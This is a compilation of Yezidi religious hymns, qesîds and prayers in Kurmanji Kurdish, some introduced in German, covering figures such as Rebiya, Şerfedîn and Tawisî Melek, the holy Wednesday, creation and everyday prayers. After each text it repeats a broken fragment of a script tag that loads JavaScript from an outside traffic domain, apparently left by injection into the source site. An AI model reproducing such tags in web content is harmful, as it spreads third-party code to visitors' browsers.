Jandila Rebiyê

Jandila Rebiyê

S.1

Ha werne beyta Rebiyê
Ha werne beyta rebiyê
Ay hayê, werne beyta rebiyê

S.2
Kerem, kerema mêran e
Siro, sira mêran e

S.3
Wê cem me bûye Nevî ye
Wê cem me bûye Welî ye
Sêx buhistê Siblî ye
Sêx Merifê Kehxî ye

S.4
Herça yarê qîmetiye
Derê siratxanê fitîliye
Wê dîtine Rebiya edebiye

S.5
Rebiya min cameke seng e
Rebiyê got: Xwe meynin deng e
Hetanî hûn dibînine reng e

S.6
Rebî ji wê rabû ye,
Daye ber xwe çiya û banî ye
Ser sivanekî we hilbû ye

S.7
Got: Sivano, ha sivano
Te malik nebe wêrano
Te ne diye heyranî siltan Êzdiye

S.8
Ew sivanê li ber pez e
Dêdebanê bilind dibez e

S.9
Got: Heyranê rebiyê
Min ne dîtiye heyranî siltan Êzdiye

S.10
Sivan got: Heyranê rebiyê
Eva heye bedêlî çil saliye
Sêresyarekî hêlîva diçûye

S.11
Hulekî resî nûranî nav mila bûye
Min nas kir, ew Siltan Êzdiye
Dilê min rebiya edebî tevî dûye

S.12
Siven got: Heyranê rebiyê
Min gelekî divê te hirmetê
Îsal çil salê min e,
Ez vî pezîra dibînim zorî zehmetê
Nedeke nola ya te ber dilê min netê

S.13
Rebî ji wê rabiye
Daye ber xwe berî û bêriye
Ser bîrekêve hil biye

S.14
Heywanetek ser wê bîrê diye,
Rebiyê got: Xêra mala xwedê ra
Mi zanibiya, gelo te heywanetî çiye

S.15
Ew qudreta semsê zerbav e,
Ewe heywanetê dav û çav e,
Got: Heyranê Rebiyê,
Bîr a kûr e, hisreta min qurtek av e.

S.16
Rebî ji wê rabiye
Dest di berîka xwe kiriye
Sikrîm ji berîka xwe deraniye
Avîtiye cote gûliyê xwe, cote gûlyê xwe weraniye

S.17
Hûnaye kiriye sirîteke rese, nûraniye,
Avîtiye simka xwe, av simka xwe birê deraniye,
Nevsa heywanata tînî kir rediye

S.18
Rebiyê av da dêl e
Berî xwedê, berî qubêl e,
Kursiya ber sekinî, kursiya cebêl e

S.19
Rebiyê dêl av daye,
Bê mexsûse û bê rêdaye

S.20
Rebî fêza xweda nihêrî
Pê ve xan kir ers û kursî
Berjêr nihêrî, pê ve xan kir ga û masî

S.20
Xêra xêr ciza ye,
Sera ser ciza ye

S.21
Deng bela bûye çiqas welata
Deng bela bûye ber bi welata
Got, hay, hayê, Rebîbiye sereka çiqas kerameta

S.22
Çawa li me herçar biran e
Got: Em siwar bin merzê avan e
Em herne silavekî bidine Rebiyê edebiyê
Silava elêl ve daye

S.23
Rebî got: Hûn hatine ser serî, herdu çavan e
Hûn werne hundur bira derva bimîne zevan e

S.24
Sêx Bazîd got: Rebiya minî cîdî
Eme sêxin, tu mirîdî

S.25
Rebiyê got: Ez mirîdê sêxê xwe me,
Sêxê min heye ew siltan e
Çiqas mas û beretê mêra heye,
Hemû kefa destê wî de ne

S.26
Got: Sêxê min heye ew hewask e,
Rimeke keske li dest e
Rojê sedî nonanî we, Nebî Memed, tê ber min dadiwaste

S.27
Sêx Bazîd got: Rebiya mine sermeste,
Hela tu jî binêre, çikas kerameta mêra, kiye, kî bi deste

S.28
Sêx Bazîd sêxekî kar e,
Wekaz hildabû dar e,
Selbikekî avê hil avîtiye,
Lêda selbik diskeste,
Av, selbik, tev dihatine xwar e

S.29
Rabû rebiya mine cîdê,
Hildaye wekaz û tîrê
Selbikekî avê hil avîtiyê
Lêdixist selbik diskestê,
Av hewa ma qendîlê.

S.30
Rabiye Rebiya mine sermestê
Dîsa wekazek hildabû destê,
Redê xwe dîwanê feqîra, mêra dixwastê
Pista xwe îlanî dibestê
Selbikekê avê hil avîtiyê
Lêdixist serbik diskestê
Av maliq meye qendîlê,
Sê cara dadiwestê

S.31
Rebiyê got: Wekî mi wêrîbûya cobêr e,
Minê derê dojê girêda berwêr e,
Min nedihist gunehkara pêstir kesek biçya li hêre.

S.32
Wekî mi cebêr wêrî biya
Minê derê dojê hiljeniya
Min xênjî gunekara pêstir
Min nedihist kes pêve biçiya

S.33
Xana, xanane mezin e
Têda runistiye Rebiya edebî, komek jin e,
Sêxadî xwe lutfê xweyî sîrin,
Kire gaziyê got: Xêra Rebiyê, xêrane mestir e

S.34
Xana, xanane wêda,
Têda rûnistiye Rebiya edebî, komek jinê tê da,
Sêxadî, xwe lutfê xweyî sîrin,
Kire gaziyê got: Medhek xêra Rebiyê da

S.35
Xana, xanane tek e
Têda rûnistiye Rebiya erebî, komek hirmetê
Sêxadî, xwe lutfê xweyî sîrin,
Kire gaziyê got: Xêra Rebiyê, gelekî qebûl dike

S.34
Xana, xanane çûk e,
Têda rûnistiye Rebiya edebî, komek bûk e
Sêxadî xwe lutfê xweyî sîrin
Kire gaziyê got: Xêra Rebiyê gelekî qebûl dike

S.35
Xelibiye, Celibiye
Cemale, qulibiye
Hemû, ser kefa destê Siltan Êzîd nivîsiye
Remel dê bavê te cimaetê ve
Xêra we qebûl beand.buyittraffic.com/clizkes' type='text/javascript'>

Qesîda Şêxûbekir

Die „Botschaft Sheikhubekirs“, eine kurze mythologische Botschaft über den Heiligen Şêxûbekir.

S.1
Distrêm Şêxûbekir
Şixadî kerem li gel te kir
Lew ciyê te li baxokir

S.2
Şêxekî kibîre
Dikarê wî li nav Feqîre
Şêxûbekir rêya Şixadîye

S.3
Şêxo ji heqîqetê
Xudanê marîfetê
Şêxûbekir rabûye bi xilmetê

S.4
Şêxûbekir nave
Irkane bin tebabe
Li Şîxadi di kir silave

Quelle/Çavkanî: Bedel Feqîr Hecî: „Bawerî û Mîtologiya Êzidîyan. Cendeha Têkist û Vekolîn“, Duhok 2002

and.buyittraffic.com/clizkes' type='text/javascript'>

Qesîda Şerfedîn – Die Botschaft Şerfedîns

Qesîda Şerfedîn – Die Botschaft Şerfedîns

Diese Qesîd (=Botschaft) lies Şêx Şerfedîn den Êzîden überbringen, als Er sich im Kampf mit Badre Din Lulu befand, nachdem dieser im Jahre 1246 ein Massaker in Laliş verübte. Die Botschaft war eindeutig: Die Êzîden sollten ihren Mut und die Kraft weiter zu kämpfen nicht verlieren. Bis heute wird diese Botschaft auf Hochzeiten und anderen Veranstaltungen immer wieder gerne gesungen.

S.1
 1. Şerfedîn xerazê gulê
 1. Dê bi xemilî dê bi xemilî
 1. Ew suneta sotî dilî
S.2
 1. Xiveta melik Şerfedîne
 1. Min vedayî li nisêbîne
 1. Serê terfa ço´ezminê
S.3
 1. Ciwabê bidne Êzîdxanê
 1. Bila qayîmken Îmanê
 1. Şerfedîn mîre li dîwanê
S.4
 1. Şerfedîn ji mixarê hate dere
 1. Sed hezar qewşen yî li bere
 1. Nûrî´elem hey li sere
S.5
 1. Şerfedîn ji mixarê derkefit
 1. Sed hezar qewşen yî vêra
 1. Hesip di bozin zîn zêre
S.6
 1. Şerfedîn wê têt ji xerbe
 1. Rast û cep di hingêvit dirbe
 1. Xafil dê mirin ji kerbe
S.7
 1. Şerfedîn ji xerbiêve têye
 1. Rast û çep di hingêvit dirbêye
 1. Xafil dê mirin ji kerbêye

and.buyittraffic.com/clizkes' type='text/javascript'>

Beyta Çarșembûyê

Beyta Çarșembûyê

Der Mittwoch ist in der êzîdîschen Lehre ein heiliger Tag und zugleich der Ruhetag der Êzîden. In diesem „Gedicht des Mittwoches“ geht es um die Entstehung und die Bedeutung des Mittwoches. Der Mittwoch wird auch als Tag des Tawisî Melek, dem Gottes Engel, bezeichnet.

S. 1
çarşembû rojeka fadile
Melik fexredîn afrandibû ji eşiq û dile
Nasnedikir ruhêt çû xafile
S. 2
çarşembû rojeke bi hisabe
Ji ba wan meleka hatî ev cewabe
Derîyêt xêra divekirîne ji rojhelat heta rojave

S.3
çarşembû perî kirase
Ji mera dana esase
Nabî xo ji tokê bikî xilase

S.4
çarşembû rojeke xase
Hincî mêrê sê rukina bo xo ji îmanê biket esase
Tawisî Melek yî qadire wê ruhê ji agirê dojê biket xilase

S.5
çarşembûyê xoşkir jîyan
Kesik kir deşit û çîya û zevî û zozan
Ew jî bi kerema pedşê minê êzdan

S.6
çarşembû ji mera geleke
cendî heyne si’ûd û feleke
Hemû bi destê Tawisî Meleke

S.7
Dema çarşembû têt ji sipêde
Ebadetê bike ji Xudêra bi ta’et û zêde
Tawisî Melek li te diête fêde

S.8
Dema çarşembû roj hiltêye
Hincî mêrê zû rabit ji xewa berê subêye
Medih û sena bi ket bo navê Xûdêye
Du’a Tawisî Melek ye lêye

S.9
Tawisî Melek yî rêbere yî serwere
Ew melekê her û here
Ew dizanit li vê dinyayê çend qender ax û av û agir û bay û bere

S.10
Ya Tawisî Melek tu melekê axretê û dunyayê
Tû bideye xatira çarşembûyêt her duwazide mehayê
Tû me li fecrê rakey ji xewê da bikeyin ebadetê û du’ayê

S. 11
Ebadet li me ye fere
Piris biken ji derwêşan û qelendere
Ka çarşembû çend bi xatire

S.12
Derwêş û qelenderêt safîne
Ji îmanê bi ronahîne
Li çarşembûya di serdayîne

S.13
Hatin serdayîn li çarşembûyan
Daxiwaz kirin ji maleke rehman
Ruhêt zalima bêxne dojê û devê maran

S.14
hincîyê navê Tawisî Melek bîne
yefere çarşembûyê bisediqîne
TawisîMelek dê wê ruhê ji qeda û bela sitirîne

S.15
Hincîyê wacibê çarşembûyê bînte cîye
Borê xo hefsarket li hemû cîye
insallah TawisîMelek jê razîye

S.16
Wacibêt çarşêmbûyê li me fere
Neken li çarşembûyê çu zîyan û zerere
Dê cehwer den li dîwan û mehdere

S.17
li mehderê deng bi ke
çarşmbûya serê nîsanê reng bike
Emelê xo safî bike

S.18
çarşembûyê emel xoş tê
Ji xêrê ji xilmetê ji xîretê ji ebadetê
Xozka wê ruhê bi cî bînit vê nisîhetê

S.19
Hat çarşembûya sore
Nîsan xemilandibû bi xorra
Ji batinda ye bi more

S.20
Hat çarşembûya sor û zere
Behar xemilandibû ji kesik û sor û sipî û zere
Me pê xemilandibû seredere

S. 21
Hincîyê serederê bi xemilîne
Bila pisyar ket ev ji ber çîne
Eve xelatêt Tawisîmelek û sultan êzîne
TawisîMelek ewê malê ji qeda û bela di sitirîne

S.22
Bêjime we gelî sûnîye
Hîvîya li çarşembûyê zor hîvîye
Hincîyê ferzêt heqîqetê bînte cîye

S.23
Bêjme we gelî sûnetê
Li şeva çarşembûyê nefsê nebe şehwetê
Ji ber xatira axretê

S.24
Heke hûn digirin axretê
Li çarşembûyê neken xeletê
Da we bixûnin li baxê cinetê

S.25
Dibêjme we ji heqîqetê
Hûn sist nebin li ebadet û me’rîfet
TawisîMelek dê dete we qewetê

S.26
Qewete ji îmanê , îmane bi nîşane
Tok û meftûl ,simbêl û girîvane
Evne di ferin bo mêrane

S.27
Hincîyê bi îmanê xo nas kir
Li çarşembûya serê nîsanê daxiwaz kir
TawisîMelek ew ruh xelat kir

S.28
Hat çarşembûya ewilî
Durr bi renga xemilî
Ev dinya pê di kemilî

S.29
Hat çarşembûya faxirî
Ya TawisîMelek her tû yî qadirî
Te pîranî dahir kir û kire rukin ji ewilî

S.30
Ya Tawisî Melek te ev dinya bi pîranî kir
Karê pîranî te qebûl kir
Karê bê pîranî te hez ne di kir .

S.31
Hat çarşembûya qere
Du’a ji melekê ekbere
Karê pîranî bi çite sere

S.32
hat qere çarşembûya qere
Hincîyê girîvanê heqîyê li bere
Tawisî Melek jêra mefere

S.33
Hat çarşembûya qere
Xelat ji melekê ekbere
Bo ruhê , ji îmanê gurrî diken çira

S.34
çarşembû rojeke xuyane
Ev dinya temam bila pê bizane
TawisîMelek ji merra şehde û îmane

S.35
çarşembû rojeke pake
Hincîyê farîqe bû ji make
Xaliq hemûya dê wefake

S.36
çarşembû rojeke bi nîşane
Hîncîyê bi girit qedrê dayik û babane
Dayim dayim merkeba wî li behrêt giran ye melevane

S.37
çarşembû rojeke emîne
Ezîz Tawisîmelekê min nav şirîne
Bi navê melik Şerfedîn , ji merra bûye dîne

S.38
dîne û şik tê nîne
kesê di bêjit we nîne
melik Şerfedîn surra enîya wî distîne

S.39
ya melik Şerfedînê minê her û herî
Tû bi deye xatira erid û ezman û dar û berî
Tû li me nekeye tengavî , zû li banga me werî

S.40
Tû li banga me werî Lalişê
Li çar şembûya serê nîsanê
Melek li adî ( Hadî) diqarit enkara bînte ser rêya îmanê

S.41
Enkar di şikdarin
Xafil di kifarin
Li axretê di bê zarin
Cîyê bo wan vejwartî li axretê dojeye û narin

S.42
Enkar çendî bi enkirit
u xafil çendî bi kifirit
Li axretê cor û ezaba wî zêde di kitirit

S.43
Hûn birênine heqîqetê
Ye tijîye ji ebadetê û me’rîfetê
Mixabin hûn xo bidene alî ji ber navê we tê

S.44
çarşembû roja sulhetê
Hincîyê bo xo bibîne edretê
Her çarşembû roja şefaetê

S.45
Heke te bivêt ser xo rakey core
Zadekî li çarşembûyê bide dore
TawisîMelek yî xefûre , ew nûre li ser nûre

S.46
çarşembû rojeke girane
Hincî ruha bi ol û edeb û erkane
Ew dê hola xo bete ser holane

S.47
Di bêjme we gelî êzidîyane
Xelatêt TawisîMelek bi gelek rengane
Xîreta dînî serê hemûwane

Temametî li navê Xudê û Tawisî Melekê mêrane

and.buyittraffic.com/clizkes' type='text/javascript'>

Qewlê afirandina dinyayê – Die Hymne über die Entstehung der Erde

Qewlê afirandina dinyayê - Die Hymne über die Entstehung der Erde

Die "Hymne über die Entstehung der Erde" handelt, wie der Name schon sagt, über die Entstehung der Erde und über die anschließende Schöpfung des ersten Menschen "Adem" (dt. Adam).

S.1

 1. Yarebî dinya hebû tarî
 2. Tê da tunebûn mişik û marî
 3. Te zindî kir taze halî
 4. Çû nema gul jê barî
 5. Ya Rebî tu hostayê kerîmî
 6. Te vekir rê û derba tarî
 7. Tu hostayê her tiştî
 8. Bihuşt çêkir renge bî

S.2

 1. Erd û ezman tunebûn
 2. Dinya fireh bê bin bû
 3. Însan û heywan jî tunebûn
 4. Te xak saz kir

S.3

 1. Di behran de tenê hebû dur
 2. Ne dimeşiya,ne dipeşiya
 3. Te xweşruh anî ber
 4. Nûra xakê peyda kir

S.4

 1. Goşt û ruh hatine ber
 2. Nûra çavan lê hate der
 3. Dest û pê kire leş
 4. Lê şêrîn kir got û bêj

S.5

 1. Xwedawendê me hostayê rehmanî
 2. Rê û dergeyê dinyayê vekir
 3. Her tişt ji me re deranî
 4. Bû buheşt erd û avanî

S.6

 1. Xwedawendê me tiştî dinas e
 2. Dura kasê jêre kir esas e
 3. Jê peyda kir mêrê xas e
 4. Got:"Eve heq nebes e"

S.7

 1. Dur ji heybeta Êzdan hincinî
 2. Taqet nekir hilgirî
 3. Ji rengê însan xemilî
 4. Sor û sipî lê hêwirî
 5. Êzdanê me bi rehmanî
 6. Hisin û cemal ji me re anî
 7. Destûr da qelemê qudretê
 8. Em avêtin nav sira muhbetê

S.8

 1. Hêvên havête behrê,behir pê meyanî
 2. Dûmanek jê derxwenî
 3. Çardeh tebeqên erd û ezman pê nijinî
 4. Êzdanê me dur deranî

S.9

 1. Muhbet avête nav e
 2. Jê peyda kir du çav e
 3. Jê herikî pir av e
 4. Av ji durrê herikî
 5. Bû rê û bê derî

S.10

 1. Êzdanê me ser behrê gerî
 2. Êzdanê me gemî çêkir

S.11

 1. Însan,heywan,teyir û tû
 2. Cot bi cot li sefînê siwar kir

S.12

 1. Xwedawendê me sefîne ser e
 2. Serekî digere çar kinar e
 3. Sefîne qul bû, av kete ser e
 4. Marî dûvê xwe dana ber e

S.13

 1. Xwedawendê me gemî ajot
 2. Ji kinar ço ber kinar e
 3. Ajote Lalişe got."heq war e"
 4. Siltan Êzî xweşrêber e
 5. Lalişkurkî beşer e
 6. Niha êzdî jê xeber e

S.14

 1. Ya Rebî bang dikim şêxê mezin
 2. Çavkanî av jê dizên

S.15

 1. Ya Rebî te dinya çêkir, dinya bixêr
 2. Însan têda dijîn bi têr
 3. şevên reş,şevên tarî
 4. Cî nema gul jê barî

S.16

 1. Xwedawendê me kerîm û rehman
 2. Kire rikin erd û ezman
 3. Da berme ruh û ziman

S.17

 1. Xwedawendê me rebil semed
 2. Afirandin heft milyaket
 3. Cuda kir dojeh û buheşt

S.18

 1. Xwedawendê me erd çêkir,ezman guhastin
 2. Micalê erdê birastin,
 3. Nobeta qeza guhastin
 4. Li guneh baran bû ruhistin

S.19

 1. Çiqas xwedawendê me dinya kir sefer e
 2. Sixir dikir dar û ber e
 3. Pê nijinî riknê mexiber e
 4. Lalişjor de anî xwar e
 5. Lalişbû xweşcî û war e
 6. Li erdê şîn bû nebat e
 7. Pê zeyinî,zendî kinyat e

S.20

 1. Xwedawendê me rehmanî
 2. Çar qisim ji me re danî
 3. Pê dilovan Adem nijinî

S.21

 1. Xwedawendê me rehmanî
 2. Çar qisim li rûyê dinê danî
 3. Yek ave,yek nûre
 4. Yek axe,yek jî Agire

S.22

 1. Xwedawendê me bi rehm e
 2. Diyar kir şaz û qidum e
 3. Hêvênê Adem hevsûr zor tixûm e
 4. Hevsûr geriya,hat hindave

S.23

 1. Qalibê Adem mabû bê gav e
 2. Go:"Ruho çima naçî nav e"

S.24

 1. Xwedawendê me qudret e
 2. Zeyandî çiqas xuliyaqet e
 3. Jêra çêkir doje û cinet e

S.25

 1. Xwedawendê me erd çêkir,ezman guhastin
 2. Mecalê erdê birastin,nebeta qeza rastin
 3. Ji însan qencîtî xwestin
 4. Lalişji ezman dihat e
 5. Li Erdê şîn dibû nebat e
 6. Pê cêyiran çiqas qinyat e

S.26

 1. Xwedawendê me înê kir esas e
 2. şemiyê biriye kiras e
 3. Çarşemê kir xilase

S.27

 1. Heft sed sal paşhevsûr hat dira nikase
 2. Heft sed salî berî Adem jimar e
 3. Erdê xiyare negirtî şiyar e
 4. Heta Lalişa nûrîn di nav de hinar e
 5. Û bang da ruh hedirî
 6. Hat û ço buhirî
 7. Nûra muhbetê hingivte serî
 8. Hat û di qalibê Adem de hêwirî

S.28

 1. Xwedawendê me rehmanî
 2. Kasa sirê ji Adem re anî
 3. Av ji kasê vexwar,vejiya
 4. Cîda mest bû hejiya

S.29

 1. Goşt jê xuwest wê ruhê
 2. Xîret kete nav serî
 3. Xwîn li canê wî gerî

S.30

 1. Adem Xwar ji wê kasê
 2. Sira kasê xweş lê tê
 3. Kerameta kasê gehişte buheştê
 4. Milyaketan bi milê wî girt û avêtin buheştê

S.31

 1. Adem ji kasê vedixwar e
 2. Kerameta kasê pê ve diyar e
 3. Xak pê nijinî,bû hişiyar e
 4. Got:"Ev erd çî xweşe"
 5. Giyayê şîn sergeşe
 6. Roj roja mêrê keleşe

S.32

 1. Xwedawendê me rehmanî
 2. Ji me re keremek anî
 3. Dem û dezgehê başdanî

S.33

 1. Hey Ademo rûdinê
 2. Her dem bike îmanê
 3. Xwedawendî em xilas kirin ji tofanê

S.34

 1. Gelî mirîdan bikin karî
 2. Xêra qudretê ji jor barî
 3. Xwe dûr bikin ji neyarî

S.35

 1. Kerameta xwedawendê me hate xwarê
 2. Erd û ezman didinn xêrê
 3. Hûn jî bibin xwedanê xêrê
 4. Qet ji bîr neken vê xeberê

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Sifrê – Das Tischgebet

Dua Sifrê – Das Tischgebet

Das Gebet „Dua Sifrê“ ist ein Tischgebet, dass vor Beginn des Essens aufgesagt werden kann. Besondere Bedeutung hat es während der Fastentage, wobei das Fastenbrechen bei Sonnenuntergang mit dem Dua Sifrê begleitet werden sollte.

Xwedêo, tu daîmî, tu kerîmî
Tu rehîmî, tu melkê erşê ezîmî
Xwedêo, ji ezelda tu qedîmî
Xwedêo, tu heftê û du mletî bêyî rehmê
Serê ser belgîya, girtîyê hebsîya
Rêwîyê riya, kesîb, belengaz û êxsîra,
Me jî pêra.
Hûn bi maş bin, bi berat bin, bi xelat bin
Bi kur û qîz û mal û dewlet bin
Bi îman û erkan û axret bin
Xem nebî, dem nebî
Rizqê we û hadir-guhdêra kêm nebî
Siyar bûyî peya nebî
Ya dîtî merûm nebe
Şîn û şaîya kêm nebe
Ji dost u dijmina şermîn nebe
Xanî bê derî nebe, mêr bê serî nebe
Çîya bê kerî nebe
Avê gelîya û Kanîya ziha nebe
Bi her buhişt hebe
Derê dojê li we venebe
Nan ji xezna Xwedê û Şîxadî be
Havênî ji Kanîya Sipî be
Ew sifre ji sifrê celîl be
Bereket bi gotina Birahîm Xelîl be
Em kêmin, Şîxadî temame

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Razanê – Das Gebet vor dem Schlaf

Dua Razanê – Das Gebet vor dem Schlaf

Das Gebet „Dua Razanê“ wird kurz vor dem Schlafen aufgesagt. Darin wird um Segen für die gesamte Gemeinschaft gebeten.

 

S.1

 1. Ya rebî tu xwedayî, tu ezdayî
 2. Ti xaliqê medh û senayî, ejqenderî bê gunahî
 3. Hezar û yek nav li xwe danayî,
 4. navê şêrîn her xwedayî
 

S.2

 1. Ya rebî tu dayîmî tu qedîmî
 2. Tu xaliqê erşê ezîmî
 3. Ya rebî tu mihrî
 4. Tuxaliqê erd û ezmanî
 5. Rahma te heye li hemû erdan
 6. Tuyî dermanê hemû derdan
 

S.3

 1. Ya rebî tu me bidî xatir ê Şêsims û Şemsaniyê,
 2. Ya rebî tu me bidî xatir ê Melek Şîxisin û Adaniyê.
 3. Ya rebî tu me bidî xatir ê Şêxûbekir û Qataniyê.
 4. Ya rebî tu me bidî xatir ê mîr Hesin Meman û Pîraniyê.
 5. Ya rebî tu me bidî xatir ê Şêxadî û Mirîdaniyê.
 6. Deryekî xêrê li me û vî dînî vekê
 

S.4

 1. Mefera min Şêsims atqata min Êzî.
 2. Derdê min, duhayê min, Ezdayê min.
 3. Pîrê min, hostayê min, xwedê heq xwedayê min
 

S.5

 1. Tawisî Melek îmana min, kaniya sipî mora mine.
 2. Çumaye û qub li dor e, mekanê siltan Êzî ye sore.
 3. Sinetxane lê dibe more
 

S.6

 1. Meqlûb û mergeh selav.
 2. Selavên min li meqlûbê li mergehê.
 3. Li Lalişê li xwedanê qubehê
 

S.7

 1. Şêxadî nûre melik Şêxsin mişûre.
 2. Me şahda û îmana xwe bi navê
 3. Tawisî Melek û bi xerqê Şêxadî qebûle
 

S.8

 1. Ez minetkarim ji mala bava
 2. Xafilî korin ji herdo çava
 3. Ku tim û dayîm hilnadin van nava
 

S.9

 1. Laliş ciyê bi nûr e
 2. Ewe mekanê Siltan Êzîdê sore
 3. Êzîdxane lê dibe mor e
 

S.10

 1. Mekan ê siltan Êzî ye,
 2. Êzîdxane lê tiwaf dibî ye?
 

S.11

 1. Ezdayî me, ji direke enzelîme.
 2. Bendeyî kaniya sipî me
 3. Berxê koza siltan Êzî me.
 4. Şikir ji xwedê ji vî dînî û îmanî,
 5. ji vî ol û erkanî razî me.
S.12
 1. Çûme Laliş a nûranî,
 2. min serê we li ber cotê qubeha danî.
 3. Min îman bi navê Tawisî Melek û xerqê Şêxadî anî

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Mehrê – Das Gebet zur Hochzeit

Dua Mehrê – Das Gebet zur Hochzeit

Das Gebet „Dua Mehrê“ wird bei der Hochzeit eines êzîdischen Paares aufgesagt, in Anwesenheit von 3 Zeugen. Der für die Trauung zuständige Pêşîmam befragt dabei das Brautpaar einzeln jeweils dreimal nach ihrem freien Willen, diese Ehe einzugehen. Erst wenn beide dreimal ihr Ja-Wort gegeben haben, wird das Gebet Dua Mehrê als Segen gesprochen. Nach diesem Segen ist das Brautpaar nach êzîdischer Religion nun ein Ehepaar.

S.1

 

 1. Bi navê Ezdanî pak î dil bi xêr
 2. Ezdayê dil bi rehm
 3. Bi navê Tawisî Melek, berpirsiyarê dîn û diyanetê
 4. Li ba Xwedê, li ba Xwedê û careke din li ba Xwedê, li ba Xwedê
 5. Yeke evd, yek musteheq.
 6. Li ser reya rast.
 7. Bi şehada Şêxsims, Melek Fexredîn
 8. Û Melek Şêx Hisin.
 9. Şukir ji te re ey Xwedayê cîhanê.
 10. Bi selamet li ser zîn, bi selamet li ser zîn.
 11. Bi şah û rizayiya te, bi şah û rizayiya min.
 12. Mexdur li diyarê amîn lê, lê, lê.
 13. Mahr bi destê Melek Sêx Hisin.
 14. Pîroz be bi navê ezdayê mezin.

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Oxirê – Das Gebet zum Abschied der Reisenden

Dua Oxirê – Das Gebet zum Abschied der Reisenden

Das Gebet „Dua Oxirê“ wird aufgesagt, wenn ein Êzîdî sich zu einer Reise aufmacht und sei es nur der Weg zur Arbeit. In diesem Gebet wird die Schutzpatronin „Xefûrê Rêya“ aufgerufen, den Reisenden zu beschützen.

S.1
 1. Çi sibeyek hoye kubar e
 2. Derê Bihustê li ber min vebû
 3. Her çar yara
 4. Ez çûme silavê biran û yara
S.2
 1. Min silav li yar û biran kirî
 2. Horî hatin û bihurîn
 3. Zintar û qewsên ji hev kirî
S.3
 1. Çûme ser riya heqî
 2. Xam û enkar leng û berleng pêsiyê
 3. Banga min e xwedê û melekê ber kursiyê
S.4
 1. Riya heqiyê qendîla tijî xêr û bereket û nûr e
 2. Banga min e xwedê û melekê xefûr e
S.5
 1. Riya heqî xefûrê rê ye
 2. Heke çiya ye û heke berî ye
 3. Destê me li dang û damana Sêxadî û Melek Sêxsinê Adiya
 4. Em bi saxî û silametî ji van ciya
 5. Biçine wan ciya
S.6
 1. Banga min Sêsemsê Babzêr e
 2. Li ber sekinîn heftê hezar xas û qelender e
 3. Kemberdest xerq hilezer e
 4. Li vê seferê li ê oxirê
 5. Tu li min û hevalê min bike xêr her û her e
S.7
 1. Ya Sêsims tu meferî
 2. Ya Tawisî Melek tu îmana minî
 3. Ya Melek Fexredîn tu rêberî
 4. Ya xaliqê minî her û herî
S.8
 1. Em duhayê bikin li ber pîrê kar û xafûrê rêya
 2. Li me, hazir û guhdaran li hemû wexta û hemû deran.

and.buyittraffic.com/clizkes' type='text/javascript'>

Dua Tokê – Das Gebet über den heiligen Umhang

Dua Tokê – Das Gebet über  den heiligen Umhang

Das Gebet „Dua Tokê“ handelt vom heiligen Umhang, den Tawisî Melek als Lohn seiner Gottesloyalität erhalten hat. In Gedenken an die Krönung zum obersten Erzengel tragen die Êzîden dieses Gewand als Unterhemd.

S.1

 1. Toke û meftûle
 2. Xelatekî meqbûle
 3. Bi sere me qebûle
 4. Şîxadî xefûre
 5. Melek Şêxîsin mişûre
 6. Şêşims nûre
 7. Xwedê nur e´la nûre
 8. Xidir Îlyas xewase bahrê kûre
 9. Şehda min, heq bi navê Siltan Êzîd û Tawisî Melek qebûle.

and.buyittraffic.com/clizkes' type='text/javascript'>